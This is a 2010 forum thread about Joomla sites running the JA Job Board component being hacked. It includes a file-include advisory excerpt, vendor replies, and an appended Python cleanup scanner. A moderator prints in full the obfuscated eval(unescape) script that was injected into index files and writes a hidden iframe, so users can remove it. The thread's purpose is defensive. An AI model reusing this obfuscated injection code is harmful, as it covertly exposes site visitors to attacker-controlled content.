jtruelson Friend
April 13, 2010 at 1:20 am #150322
Our development site was compromised. We have had to restore from a recent backup.
All index pages were appended with hex coded script. Support ticket has been submitted – no reply as of yet.
So far our efforts to isolate the cause have turned up the following:
from http://www.securityfocus.com/bid/39384
The JA Job Board ‘com_jajobboard’ component for Joomla! is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
JA Job Board ‘com_jajobboard’ 1.4.4 is vulnerable; other versions may be affected.
Anonymous Moderator JA Developer
April 13, 2010 at 4:36 am #340174
Hello jtruelson,
We express our sincere apologies for all the inconvenience and problems that you have faced. 🙁
In fact, a new developer was newly assigned to share the support workload for Job Board, and while he accessed your source via your FTP, the virus penetrated those files from his infected machine. I would like to confirm that the download package and our dev server are free from virus.
His machine has been reinstalled now with anti-virus protection. Please give us access to your FTP again via ticket ID# (DTD-726753) for correcting our mistake and fixing the related issues.
He handles two cases, and the other has been contacted to check if he faces the same problem, for the soonest solution.
April 14, 2010 at 9:01 am #340320
Hello,
The Web site was hacked 2 times since the 1.4.4 update! Web site is now unavailable 😮 for me
April 14, 2010 at 10:55 am #340330
Hi,
My site was also hacked on Friday whilst awaiting support from your team.
We have had to rebuild the site and work is still ongoing to restore it.
I haven’t been contacted regarding your employee’s virus, but the two might be connected.
Could you confirm that this is definitely due to a virus on the PC of one of your team, not a vulnerability in JobBoard itself?
Is there anything else I should do to protect against further attacks?
Thanks,
April 14, 2010 at 2:23 pm #340357
Also hacked here on Sunday. I submitted a ticket.
Anonymous Moderator JA Developer
April 15, 2010 at 3:03 am #340407
Hi all,
• We would like to confirm that this is definitely due to a virus on the PC of one of our team. JA Job Board packages as well as all other download packages and our dev servers are protected by a licensed anti-virus system and are free from virus. This is the first case and the last that will ever happen. We hereby apologize for all inconveniences that this may have caused.
• There are many causes leading to security holes for hacked websites. The problem caused by auto generated scripts is just one of those.
• After infection, the system shall not work stably. However, if the auto inserted scripts are removed from infected files, the whole system shall work fine again.
• SOLUTION:
– For those whose job site seems not to be working stably recently, kindly open the source files to track down infected files. This can be done without influencing the running computer or the whole website, because the strange scripts are lines of JavaScript, not a program file with *.exe.
– Infected files (normally in index.php or index2.php and some of files from running template) shall be inserted with the below unwanted lines at the bottom. You can manually search and get it removed. The unwanted script is as follows<blockquote><script>eval(unescape(‘%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29’)); </script></blockquote>
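One way to carry out the manual search described in the moderator's post above, as an added example that is not part of the thread or the vendor's own code: it finds `<script>eval(unescape('%..'))</script>` blocks in site files, percent-decodes the first layer for review without executing it, and strips the block. The function names, the `.infected` backup suffix and the sample tree (with a harmless stand-in payload) are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Shape of the injected line quoted in the post: a <script> whose whole body is
# eval(unescape('%xx%xx...')). Bytes regex, so files in any encoding are safe.
INJECTED = re.compile(
    rb"<script[^>]*>\s*eval\(\s*unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}){8,})['\"]"
    rb"\s*\)\s*\)\s*;?\s*</script>",
    re.IGNORECASE,
)

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Return [(path, first_layer)] per injected block; decoded, never executed."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            for m in INJECTED.finditer(path.read_bytes()):
                findings.append((path, unquote(m.group(1).decode("ascii"))))
    return findings

def clean_file(path):
    """Strip injected blocks; keep the original as <name>.infected for analysis."""
    path = Path(path)
    original = path.read_bytes()
    cleaned, count = INJECTED.subn(b"", original)
    if count:
        # Move the .infected copy out of the web root once it has been reviewed.
        path.with_name(path.name + ".infected").write_bytes(original)
        path.write_bytes(cleaned.rstrip() + b"\n")
    return count

def demo():
    """Constructed site tree with a harmless stand-in payload (alert(1))."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "templates").mkdir()
        payload = "%61%6C%65%72%74%28%31%29"  # constructed, not the page's payload
        (site / "index.php").write_text(
            "<?php echo 'home'; ?>\n<script>eval(unescape('%s')); </script>\n" % payload)
        (site / "templates" / "index.php").write_text("<?php echo 'clean'; ?>\n")
        found = [(p.name, text) for p, text in scan_tree(site)]
        removed = clean_file(site / "index.php")
        return found, removed, scan_tree(site), (site / "index.php").read_text()

if __name__ == "__main__":
    print(demo())
```

Removing the appended line does not change whatever wrote it, so the FTP credentials involved should be rotated before the cleaned files go back into service.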
This topic contains 6 replies, has 5 voices, and was last updated by Anonymous 14 years, 7 months ago.